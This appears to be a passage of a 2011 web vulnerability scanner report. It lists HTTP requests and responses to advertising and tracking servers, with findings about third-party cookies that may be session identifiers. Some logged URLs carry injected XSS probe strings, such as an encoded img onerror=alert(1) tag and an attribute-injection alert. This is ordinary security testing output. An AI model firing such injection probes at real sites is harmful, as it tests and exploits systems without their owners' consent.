GET /ssframework/adStreamJSController.xml?a=getadscheduleforcontent&format=vast&fetchads=overlay&ss_partnerId=626&ss_height=360&ss_width=480&asVersion=3&jsa=Y&blacklist=&ss_mediaCategories=&ss_mediaDescription=&ss_mediaId=v18978294NGnK88j8&ss_mediaKeywords=&ss_mediaTitle=MagadheeraSmartDesis.TK.mp4&ss_mediaURL=videodetails&ss_pageURL=http%3A//www.veoh.com/browse/videos/category/action_adventure4957f%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Eb411440d815/watch/v18978294NGnK88j8/x26amp&ss_streamPageURL=http%3A//www.veoh.com/browse/videos/category/action_adventure4957f%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Eb411440d815/watch/v18978294NGnK88j8/x26amp HTTP/1.1
Host: app.scanscout.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: userCookie=4673e32b6fda399c64d2cb48d3800e10; uniques=110203|626_110203; psh=626_1296767254411; networkInfo=57872|110203_160737|626|33687174|null|5945246|1426141|1|14.0|true|4|true|us|V|0; campUnique=1426141; sssrvyhst2=110203_1426141; behavioralSegments=29_110203|32_110203|263_110203
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bmx3/broker.pli?pid=p59844736&PRAd=60056&AR_C=656 HTTP/1.1
Host: ar.voicefive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Feb 2011 22:03:49 GMT
Content-Type: application/x-javascript
Connection: close
Vary: Accept-Encoding
Set-Cookie: ar_p59844736=exp=1&initExp=Thu Feb 3 22:03:49 2011&recExp=Thu Feb 3 22:03:49 2011&prad=60056&arc=656&; expires=Wed 04-May-2011 22:03:49 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296770629; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /u/getuid/?nocache=0%2E6689167399890721&a=715b8c3a075d11dea9710019b9f1584b HTTP/1.1
Host: audience.visiblemeasures.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:08:03 GMT
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV"
Set-Cookie: uid=9127E54769D9F368FC8156526FB88F6559521056;Path=/;Domain=.visiblemeasures.com;Expires=Fri, 03-Feb-2012 21:08:03 GMT
Set-Cookie: sid_715B8C3A075D11DEA9710019B9F1584B=9127E54769D9F368FC8156526FB88F6559521056;Path=/;Domain=.visiblemeasures.com;Expires=Thu, 03-Feb-2011 21:38:03 GMT
Content-Type: text/plain
Content-Length: 89
Server: Jetty(7.x.y-SNAPSHOT)
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function. Note, however, that the sid_715B8C3A075D11DEA9710019B9F1584B cookie set in this response has a 40-hex-character value and a lifetime of exactly 30 minutes (its Expires is 30 minutes after the response Date), which are the usual characteristics of a session identifier, even though its value here is identical to the one-year uid cookie; confirm what it is used for before treating the risk as reduced.
Request
GET /u/getuid/ HTTP/1.1
Host: audience.visiblemeasures.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: uid=9127E54769D9F368FC8156526FB88F6559521056; sid_715B8C3A075D11DEA9710019B9F1584B=9127E54769D9F368FC8156526FB88F6559521056;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:03:50 GMT
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV"
Set-Cookie: uid=9127E54769D9F368FC8156526FB88F6559521056;Path=/;Domain=.visiblemeasures.com;Expires=Fri, 03-Feb-2012 22:03:50 GMT
Set-Cookie: sid=C5F474F2682AA8DAE8075A6889492B4928B445B7;Path=/;Domain=.visiblemeasures.com;Expires=Thu, 03-Feb-2011 22:33:50 GMT
Content-Type: text/plain
Content-Length: 89
Server: Jetty(7.x.y-SNAPSHOT)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function. Note, however, that the sid cookie set in this response (a 40-hex-character value that differs from the uid value, with a 30-minute lifetime, scoped to the parent domain .visiblemeasures.com and without the HttpOnly flag) has the characteristics of a session identifier, so the reduced-risk assessment should not be relied on until its function has been confirmed.
Request
GET /b?c1=8&c2=6036036&rn=439947884&c7=http%3A%2F%2Fcore.videoegg.com%2Feap%2F12368%2Fhtml%2Fjstags.html%3FCCID%3D0%26r%3D0.3821160274092108&c3=1&c9=http%3A%2F%2Fwww.tucows.com%2Fvideoegg%2Fad.html&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://core.videoegg.com/eap/12368/html/jstags.html?CCID=0&r=0.3821160274092108
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 204 No Content
Content-Length: 0
Date: Thu, 03 Feb 2011 20:51:19 GMT
Connection: close
Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Sat, 02-Feb-2013 20:51:19 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p?c1=8&c2=6035784&c3=0&c4=2331.7717.9237.23663&c5=4871&c6=f978e9b0-271c-47b8-9a97-caba692f0bb2&c10=11073.35211.76599&c15=&cj=1&rn=5575236558291927040 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Thu, 03 Feb 2011 21:59:56 GMT
Connection: close
Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Sat, 02-Feb-2013 21:59:56 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: blogsearch.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<html><head><meta HTTP-EQUIV="content-type" content="text/html; charset=UTF-8"><meta description="Google Blog Search provides fresh, relevant search results from millions of feed-enabled blogs. Users ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bkshp HTTP/1.1
Host: books.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:04 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=f09ac1e2ccf2b58a:TM=1296765124:LM=1296765124:S=VHIb6cqmET3q7qwK; expires=Sat, 02-Feb-2013 20:32:04 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: OFE/0.1
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /books HTTP/1.1
Host: books.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:31:57 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=6552b75bb12891c4:TM=1296765117:LM=1296765117:S=z2Yh1vRAeMtxN6LI; expires=Sat, 02-Feb-2013 20:31:57 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: OFE/0.1
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?pixid=99004680 HTTP/1.1
Host: bp.specificclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adp=7CUZ^0^8191; smdmp=7BUF:99061898^780z:1215201001^780z:201201001^780z:1012200938^780z:1011201009^77xf:99004015^77xe:99001525^77x6:99011769^75W4:99002797^75W4:99004740^74ry:104201102^74ry:811200901^74Xd:99063500; adf=7CUZ^0^0; ug=uosDj9Liw_xRTA
Response
HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store,no-cache,must-revalidate
Cache-Control: post-check=0,pre-check=0
Pragma: no-cache
p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Set-Cookie: adp=7CUZ^0^8191; Domain=.specificclick.net; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/
Set-Cookie: ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/
Set-Cookie: smdmp=7CVs:99004680^7BUF:99061898^780z:1215201001^780z:201201001^780z:1012200938^780z:1011201009^77xf:99004015^77xe:99001525^77x6:99011769^75W4:99002797^75W4:99004740^74ry:104201102^74ry:811200901^74Xd:99063500; Domain=.specificclick.net; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/
Set-Cookie: adf=7CUZ^0^0; Domain=.specificclick.net; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/
p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Set-Cookie: ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/
p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Set-Cookie: nug=; Domain=.specificclick.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Location: http://www.googleadservices.com/pagead/conversion/1030885431/?label=z3WgCNenmAIQt6DI6wM&guid=ON&script=0
Content-Type: text/html
Content-Length: 0
Date: Thu, 03 Feb 2011 19:03:58 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /buzz HTTP/1.1
Host: buzz.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 19:35:40 GMT
Set-Cookie: B=fjoviv16km0sc&b=3&s=eo; expires=Tue, 03-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: of01e2=08556806c2aa36978721cfcb146d3d49; path=/; domain=buzz.yahoo.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, private
Pragma: no-cache
Location: http://login.yahoo.com/?.pd=c%3DhYw09vWp2e4FXlpTB9bd0rU-&.src=ybz&.intl=us&.done=http%3A%2F%2Fbuzz.yahoo.com%2Fvote%2F
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83
<!-- fe13.buzz.re1.yahoo.com uncompressed/chunked Thu Feb 3 11:35:40 PST 2011 -->
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function. Note that the of01e2 cookie set in this response has a 32-hex-character value and no Expires attribute (so it lives for the browser session only), and is set while redirecting the client to login.yahoo.com; those are properties a session cookie would also have, so confirm its function before discounting the risk.
Request
GET /c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.msn.com%2Fdefaultwpe7.aspx&lng=en-us&tz=-6&scr=1920x1200x16&rid=89026872c5cc408f95bb663ec7f2d02f&udc=true&rnd=1296786631905&RedC=c.msn.com&MXFR=AD04D6F8B2FF44629973BD0674351135 HTTP/1.1
Accept: */*
Referer: http://www.msn.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: c.redcated
Proxy-Connection: Keep-Alive
Response
HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Location: http://c.msn.com/c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.msn.com%2Fdefaultwpe7.aspx&lng=en-us&tz=-6&scr=1920x1200x16&rid=89026872c5cc408f95bb663ec7f2d02f&udc=true&rnd=1296786631905&MUID=AD04D6F8B2FF44629973BD0674351135
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=AD04D6F8B2FF44629973BD0674351135; domain=.redcated; expires=Tue, 23-Aug-2011 02:29:39 GMT; path=/;
Date: Fri, 04 Feb 2011 02:29:38 GMT
Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /AVE/go/285974183/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.hollandamerica.com/find-cruise-vacation/OnlineAdOffers.action?specialOfferType=onad_28&WT.mc_id=Partner_ScanScout_US_PreRollCompanion
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296770644-3981256; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=5F36AEF5D4FB49DB9F81F864E31B34FC; expires=Monday, 22-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=af02/243a7; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=c003d4d/243a7/110b9ea7/af02/4d4b2654; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Thu, 03 Feb 2011 22:04:03 GMT
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /AVE/go/286182932/direct/01/]] HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.hollandamerica.com/find-cruise-vacation/OnlineAdOffers.action?specialOfferType=onad_28&WT.mc_id=Partner_ScanScout_US_WonderPreRoll
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296770649-3995471; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=8EE4F442F1FB4932AD6D6003B4E01B9A; expires=Monday, 22-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=af02/243a7; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=bcab411/243a7/110ece14/af02/4d4b2659; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Thu, 03 Feb 2011 22:04:08 GMT
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p/simplemodal/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p/swfobject/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /adServer/adServerESI.aspx HTTP/1.1
Host: core.insightexpressai.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Length: 18
Content-Type: text/html; charset=utf-8
Set-Cookie: DW=221e32e71296770758; expires=Wed, 29-Jan-2031 22:05:58 GMT; path=/; domain=insightexpressai.com
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Expires: Thu, 03 Feb 2011 22:05:58 GMT
Pragma: no-cache
Date: Thu, 03 Feb 2011 22:05:58 GMT
Connection: close
Cache-Control: no-store
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /yui/ HTTP/1.1
Host: developer.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:47:44 GMT
Set-Cookie: B=auto2ed6km1j0&b=3&s=j0; expires=Tue, 03-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 29638
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="descr ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /yui/license.html HTTP/1.1
Host: developer.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:04:29 GMT
Set-Cookie: B=1pm748p6klrhd&b=3&s=dl; expires=Tue, 03-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 22172
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="descr ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /red/psi/sites/www.ip-adress.com/p.json?callback=_ate.ad.hpr&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.ip-adress.com%2Fwhois%2Fsmartdevil.com44a08'%253b28a34fbd60c%2Fx22&ref=http%3A%2F%2Fburp%2Fshow%2F36&1l3wvz8 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh31.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296751058.60|1296659685.66; psc=4; uid=4d1ec56b7612a62c
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 286
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Fri, 04 Feb 2011 17:55:19 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sun, 06 Mar 2011 17:55:19 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296842119.60|1296659685.66; Domain=.addthis.com; Expires=Sun, 03-Feb-2013 02:28:36 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Fri, 04 Feb 2011 17:55:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 04 Feb 2011 17:55:19 GMT
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ssframework/dt/pt.png?trackcd=1288991585470 HTTP/1.1
Host: dt.scanscout.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: userCookie=4673e32b6fda399c64d2cb48d3800e10; uniques=110203|626_110203; psh=626_1296767254411; behavioralSegments=29_110203|32_110203; networkInfo=57872|110203_160737|626|33687174|null|5945246|1426141|1|14.0|true|4|true|us|V|0; campUnique=1426141; sssrvyhst2=110203_1426141
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:07:44 GMT
Server: Apache
p3p: policyref=/w3c/p3p.xml
Set-Cookie: behavioralSegments=29_110203|32_110203|263_110203; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:07:44 GMT; Path=/
Content-Length: 101
Connection: close
Content-Type: image/png
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /quant.js HTTP/1.1
Host: edge.quantserve.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
ETag: "18334:E0-1152220633-1296770771366"
Vary: Accept-Encoding
Last-Modified: Thu, 03-Feb-2011 22:06:11 GMT
Content-Type: application/x-javascript
Set-Cookie: mc=4d4b26d3-59834-71bae-edc2f; expires=Thu, 03-Feb-2021 22:06:11 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Fri, 04 Feb 2011 22:06:11 GMT
Content-Length: 5265
Date: Thu, 03 Feb 2011 22:06:11 GMT
Server: QS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /showthread.php?t\\x3d1355583\\x22 HTTP/1.1
Host: forums.digitalpoint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pagead/ads?client=ca-pub-3033999741136561&output=html&h=60&slotname=2067036752&w=468&lmt=1296787016&flash=0&url=http%3A%2F%2Fwww.bizfind.us%2F15%2F182221%2Fabc-development-inc%2Fchicago.aspx%2Fx22%2F%2522ns%3D%2522alert(0x0006C1)&dt=1296787016748&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=7707606529&correlator=1296787013038&frm=0&adk=2139689042&ga_vid=1487308896.1296787013&ga_sid=1296787013&ga_hid=720933573&ga_fc=1&u_tz=-360&u_his=0&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=0&u_nmime=0&biw=1172&bih=684&eid=30143103&fu=0&ifi=2&dtd=12&xpc=YHKwpL9Wg6&p=http%3A//www.bizfind.us HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: googleads.g.doubleclick.net
Proxy-Connection: Keep-Alive
Cookie: test_cookie=CheckForPermission
Response
HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: id=2299c2bdf900002f||t=1296786962|et=730|cs=ziqtnqpy; expires=Sun, 03-Feb-2013 02:36:02 GMT; path=/; domain=.doubleclick.net
